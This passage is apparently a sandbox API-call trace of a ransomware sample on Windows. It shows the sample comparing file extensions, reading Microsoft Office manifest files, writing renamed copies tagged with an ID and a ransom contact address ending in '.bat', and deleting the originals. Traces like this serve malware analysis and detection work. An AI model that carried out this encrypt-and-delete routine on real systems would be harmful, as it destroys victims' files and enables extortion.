[0058.747] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.747] lstrlenW (lpString=".doc") returned 4 [0058.747] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString=".docx") returned 5 [0058.747] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.747] lstrlenW (lpString=".pdf") returned 4 [0058.747] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString=".xls") returned 4 [0058.747] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString=".xlsx") returned 5 [0058.747] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.747] lstrlenW (lpString=".ppt") returned 4 [0058.747] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.748] lstrlenW (lpString=".zip") returned 4 [0058.748] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.748] lstrlenW (lpString=".rar") returned 4 [0058.748] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.748] lstrlenW (lpString=".bz2") returned 4 [0058.748] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.748] lstrlenW (lpString=".7z") returned 3 [0058.748] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.748] lstrlenW (lpString=".dbf") returned 4 [0058.748] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.748] lstrlenW (lpString=".1cd") returned 4 [0058.748] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.748] lstrlenW (lpString=".jpg") returned 4 [0058.748] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.748] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.748] lstrlenW (lpString="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 53 [0058.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.749] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=2147) returned 1 [0058.749] CloseHandle (hObject=0x358) returned 1 [0058.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml")) returned 0x220 [0058.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.749] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.749] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0058.750] GetLastError () returned 0x0 [0058.750] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x863, lpOverlapped=0x0) returned 1 [0059.315] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x870, lpOverlapped=0x0) returned 1 [0059.316] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0059.316] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.316] SetEndOfFile (hFile=0x368) returned 1 [0059.317] CloseHandle (hObject=0x368) returned 1 [0059.321] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.321] SetEndOfFile (hFile=0x358) returned 1 [0059.322] CloseHandle (hObject=0x358) returned 1 [0059.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml")) returned 1 [0059.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.323] lstrlenW (lpString=".doc") returned 4 [0059.323] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString=".docx") returned 5 [0059.323] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.323] lstrlenW (lpString=".pdf") returned 4 [0059.323] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString=".xls") returned 4 [0059.323] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString=".xlsx") returned 5 [0059.323] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.323] lstrlenW (lpString=".ppt") returned 4 [0059.323] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.323] lstrlenW (lpString=".zip") returned 4 [0059.323] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.323] lstrlenW (lpString=".rar") returned 4 [0059.323] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString=".bz2") returned 4 [0059.323] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString=".7z") returned 3 [0059.323] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.323] lstrlenW (lpString=".dbf") returned 4 [0059.323] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.323] lstrlenW (lpString=".1cd") returned 4 [0059.323] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.323] lstrlenW (lpString=".jpg") returned 4 [0059.324] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.324] lstrlenW (lpString=".doc") returned 4 [0059.324] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString=".docx") returned 5 [0059.324] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.324] lstrlenW (lpString=".pdf") returned 4 [0059.324] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString=".xls") returned 4 [0059.324] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString=".xlsx") returned 5 [0059.324] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.324] lstrlenW (lpString=".ppt") returned 4 [0059.324] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.324] lstrlenW (lpString=".zip") returned 4 [0059.324] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.324] lstrlenW (lpString=".rar") returned 4 [0059.324] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString=".bz2") returned 4 [0059.324] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString=".7z") returned 3 [0059.324] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.324] lstrlenW (lpString=".dbf") returned 4 [0059.324] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.325] lstrlenW (lpString=".1cd") returned 4 [0059.325] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0059.325] lstrlenW (lpString=".jpg") returned 4 [0059.325] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.325] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.325] lstrlenW (lpString="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 53 [0059.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.326] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=65002) returned 1 [0059.326] CloseHandle (hObject=0x358) returned 1 [0059.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.326] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.326] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.327] GetLastError () returned 0x0 [0059.327] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xfdea, lpOverlapped=0x0) returned 1 [0059.397] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xfdf0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xfdf0, lpOverlapped=0x0) returned 1 [0059.399] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0059.399] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.399] SetEndOfFile (hFile=0x368) returned 1 [0059.399] CloseHandle (hObject=0x368) returned 1 [0059.401] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.401] SetEndOfFile (hFile=0x358) returned 1 [0059.403] CloseHandle (hObject=0x358) returned 1 [0059.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml")) returned 1 [0059.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.404] lstrlenW (lpString=".doc") returned 4 [0059.404] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.404] lstrlenW (lpString=".docx") returned 5 [0059.404] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.404] lstrlenW (lpString=".pdf") returned 4 [0059.404] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.404] lstrlenW (lpString=".xls") returned 4 [0059.404] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.404] lstrlenW (lpString=".xlsx") returned 5 [0059.404] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.404] lstrlenW (lpString=".ppt") returned 4 [0059.404] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.404] lstrlenW (lpString=".zip") returned 4 [0059.405] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.405] lstrlenW (lpString=".rar") returned 4 [0059.405] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString=".bz2") returned 4 [0059.405] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString=".7z") returned 3 [0059.405] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.405] lstrlenW (lpString=".dbf") returned 4 [0059.405] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.405] lstrlenW (lpString=".1cd") returned 4 [0059.405] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.405] lstrlenW (lpString=".jpg") returned 4 [0059.405] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.405] lstrlenW (lpString=".doc") returned 4 [0059.405] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString=".docx") returned 5 [0059.405] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.405] lstrlenW (lpString=".pdf") returned 4 [0059.405] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString=".xls") returned 4 [0059.405] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.405] lstrlenW (lpString=".xlsx") returned 5 [0059.405] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.406] lstrlenW (lpString=".ppt") returned 4 [0059.406] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.406] lstrlenW (lpString=".zip") returned 4 [0059.406] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.406] lstrlenW (lpString=".rar") returned 4 [0059.406] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.406] lstrlenW (lpString=".bz2") returned 4 [0059.406] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.406] lstrlenW (lpString=".7z") returned 3 [0059.406] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.406] lstrlenW (lpString=".dbf") returned 4 [0059.406] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.406] lstrlenW (lpString=".1cd") returned 4 [0059.406] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 104 [0059.406] lstrlenW (lpString=".jpg") returned 4 [0059.406] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.406] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.406] lstrlenW (lpString="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 53 [0059.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.408] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=9216) returned 1 [0059.408] CloseHandle (hObject=0x368) returned 1 [0059.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.408] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.408] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.410] GetLastError () returned 0x0 [0059.410] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2400, lpOverlapped=0x0) returned 1 [0059.456] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2410, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2410, lpOverlapped=0x0) returned 1 [0059.457] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0059.457] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.457] SetEndOfFile (hFile=0x344) returned 1 [0059.458] CloseHandle (hObject=0x344) returned 1 [0059.459] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.459] SetEndOfFile (hFile=0x368) returned 1 [0059.460] CloseHandle (hObject=0x368) returned 1 [0059.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.460] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml")) returned 1 [0059.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0059.461] lstrlenW (lpString=".doc") returned 4 [0059.461] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.461] lstrlenW (lpString=".docx") returned 5 [0059.461] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.461] lstrlenW (lpString=".pdf") returned 4 [0059.461] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.461] lstrlenW (lpString=".xls") returned 4 [0059.461] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.461] lstrlenW (lpString=".xlsx") returned 5 [0059.461] lstrcmpiW 